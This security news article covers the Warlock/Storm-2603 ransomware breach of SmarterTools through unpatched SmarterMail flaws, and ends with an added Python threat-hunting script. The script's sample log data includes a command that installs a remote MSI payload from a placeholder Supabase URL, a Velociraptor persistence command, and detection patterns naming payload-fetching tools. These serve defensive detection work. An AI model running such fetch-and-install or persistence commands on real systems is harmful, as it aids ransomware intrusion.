
Last week, SmarterTools confirmed that the Warlock (aka Storm-2603) ransomware group exploited unpatched SmarterMail instances to infiltrate networks.
Derek Curtis, the company’s chief commercial officer, said the incident occurred on January 29, 2026, when an email server that had not been updated to the latest version was compromised.
“Prior to the breach, we had approximately 30 servers/VMs with SmarterMail installed across our network,” Curtis explained. “Unfortunately, we were unaware that one VM that was set up by an employee had not been updated, which resulted in its email server being compromised, which led to the breach.”
However, SmarterTools emphasized that the breach did not affect its website, shopping cart, My Account portal, or several other services, and no business applications or account data were affected or compromised.
Approximately 12 Windows servers on the company’s office network, plus a secondary data center used for quality control (QC) testing, have been confirmed as affected. CEO Tim Uzanti said the “attempted ransomware attack” also hit hosted customers using SmarterTrack.
“Hosted customers using SmarterTrack were most affected,” Uzanti said in another community portal thread. “This was not due to an issue with SmarterTrack itself, but rather because that environment was easier to access than others once it entered our network.”
Additionally, SmarterTools acknowledged that after the Warlock group gained initial access, it waited several days before taking control of the Active Directory server, creating new users, and dropping additional payloads, including Velociraptor and a file-encrypting locker.
“Once these attackers gain access, they typically install files and wait approximately six to seven days before taking further action,” Curtis said. “This explains why some customers encountered breaches even after updating. The initial breach occurred before the update, but the malicious activity was triggered later.”
Although it is currently unclear which vulnerabilities in SmarterMail were weaponized by attackers, it is worth noting that multiple flaws in the email software have been exploited in the wild: CVE-2025-52691 (CVSS score: 10.0), CVE-2026-23760, and CVE-2026-24423 (CVSS score: 9.3).
CVE-2026-23760 is an authentication bypass flaw that lets any user reset the password of a SmarterMail system administrator by sending a specially crafted HTTP request. CVE-2026-24423, on the other hand, stems from a weakness in the ConnectToHub API method and enables unauthenticated remote code execution (RCE).
The flaw was addressed in SmarterMail build 9511. Last week, the US Cybersecurity and Infrastructure Security Agency (CISA) confirmed that CVE-2026-24423 was being exploited in ransomware attacks.
In a report released Monday, cybersecurity firm ReliaQuest said it had identified activity potentially related to Warlock, including the exploitation of CVE-2026-23760 to bypass authentication and stage ransomware payloads on internet-exposed systems. After gaining initial access, the attackers download a malicious MSI installer (‘v4.msi’) from Supabase, a legitimate cloud-based backend platform, and use it to install Velociraptor.
“This vulnerability allows an attacker to bypass authentication and reset the administrator password, but Storm-2603 chains this access with the software’s built-in ‘volume mount’ functionality to take full control of the system,” said security researcher Alexa Femminella. “During the breach, the group installs Velociraptor, a legitimate digital forensics tool used in previous campaigns, to maintain access and prepare for ransomware.”
The security community also points out that the two vulnerabilities ultimately lead to the same outcome: CVE-2026-23760 grants unauthenticated administrative access via the password reset API, which can then be combined with the volume mount logic to execute code, whereas CVE-2026-24423 offers a more direct path to code execution through the ConnectToHub API.
That attackers are choosing the former path suggests it lets their activity blend into ordinary administrative workflows and evade detection.
“By exploiting legitimate functionality (resetting a password or mounting a drive), rather than relying solely on a single ‘noisy’ exploit primitive, operators can reduce the effectiveness of detections specifically tailored to known RCE patterns,” Femminella added. “This pace of weaponization is consistent with ransomware operators quickly analyzing vendor fixes and developing working techniques shortly after release.”
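As an added illustration (not code from the original article, ReliaQuest or SmarterTools), the following Python hunt walks a constructed, Sysmon-style process-creation log for the indicators the article names: an MSI fetched from Supabase storage, a file called v4.msi, and Velociraptor being registered as a service. Following Curtis's point about delayed activity, it also flags hosts where the first indicator predates the upgrade to a fixed build, since patching alone does not evict an attacker who already has a foothold. The field names, the MailService.exe parent process, the sample events and the upgrade timestamps are all assumptions made for the example.

```python
"""Hunt a process-creation log for the Warlock/Storm-2603 post-exploitation
chain (MSI from Supabase, Velociraptor service install) and report whether the
first indicator on each host predates that host's upgrade to a fixed build.

All sample data below is constructed for this example; the Sysmon-style field
names and the MailService.exe parent are assumptions, not vendor telemetry.
"""
from datetime import datetime, timezone

# Constructed sample events in the shape of Sysmon Event ID 1 (process create).
SAMPLE_EVENTS = [
    # Benign: an administrator applies the SmarterMail update by hand.
    {"host": "mail01", "ts": "2026-02-04T09:00:00Z",
     "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\admin\Downloads\SmarterMail_9526.msi" /qn'},
    # Suspicious: the mail service itself stages 'v4.msi' from Supabase storage.
    {"host": "mail01", "ts": "2026-01-29T03:12:44Z",
     "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Program Files (x86)\SmarterTools\SmarterMail\Service\MailService.exe",
     "cmdline": "msiexec.exe /i https://example-project.supabase.co/storage/v1/object/public/pkg/v4.msi /quiet /norestart"},
    # Suspicious: Velociraptor registered as a Windows service for persistence.
    {"host": "mail01", "ts": "2026-01-29T03:13:10Z",
     "image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'"C:\Program Files\Velociraptor\Velociraptor.exe" --config client.config.yaml service install'},
    # A second host with ordinary activity only.
    {"host": "qc-web02", "ts": "2026-02-01T11:20:00Z",
     "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Constructed: when each host was upgraded to a build containing the fixes.
UPGRADE_TIMES = {"mail01": "2026-02-04T09:00:00Z", "qc-web02": "2026-01-20T08:00:00Z"}

# Binaries commonly used to fetch or install a second-stage payload.
INSTALLER_IMAGES = ("msiexec.exe", "powershell.exe", "curl.exe", "certutil.exe", "bitsadmin.exe")


def _ts(s):
    """Parse an ISO-8601 UTC timestamp of the form YYYY-MM-DDTHH:MM:SSZ."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def classify(event):
    """Return the indicator names that match a single process-creation event."""
    cmd = event["cmdline"].lower()
    image = _basename(event["image"])
    parent = _basename(event["parent"])
    hits = []
    if image in INSTALLER_IMAGES and ".supabase.co/" in cmd:
        hits.append("installer_from_supabase")
    if "v4.msi" in cmd:
        hits.append("v4_msi")
    if "velociraptor" in image or "velociraptor" in cmd:
        hits.append("velociraptor_present")
        if " service install" in cmd:
            hits.append("velociraptor_service_install")
    # Assumption: the mail server process has no business spawning an installer.
    if image in INSTALLER_IMAGES and parent == "mailservice.exe":
        hits.append("installer_spawned_by_mail_service")
    return hits


def hunt(events, upgrade_times):
    """Group indicator hits per host; mark hosts whose first hit predates the upgrade."""
    per_host = {}
    for ev in sorted(events, key=lambda e: _ts(e["ts"])):
        hits = classify(ev)
        if not hits:
            continue
        entry = per_host.setdefault(ev["host"], {"first_seen": ev["ts"], "indicators": set()})
        entry["indicators"].update(hits)
    findings = []
    for host, entry in per_host.items():
        upgraded = upgrade_times.get(host)
        findings.append({
            "host": host,
            "first_seen": entry["first_seen"],
            "indicators": sorted(entry["indicators"]),
            # True means the foothold was planted before the patch: rebuild, do not just update.
            "pre_patch_access": upgraded is not None and _ts(entry["first_seen"]) < _ts(upgraded),
        })
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS, UPGRADE_TIMES):
        print(finding)
```

The rules deliberately key on the legitimate-tool artefacts the article describes (an installer reaching out to Supabase, Velociraptor's own `service install` command) rather than on an exploit signature, which is the kind of signal that survives when the operator avoids a noisy RCE primitive. Run against real Sysmon or EDR process telemetry, the parent-process rule should be tuned to the service account and binary your mail server actually runs under.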
SmarterMail users are urged to upgrade immediately to the latest version (build 9526) and to isolate their email servers from the rest of the network so that the lateral movement used to deploy ransomware is blocked.
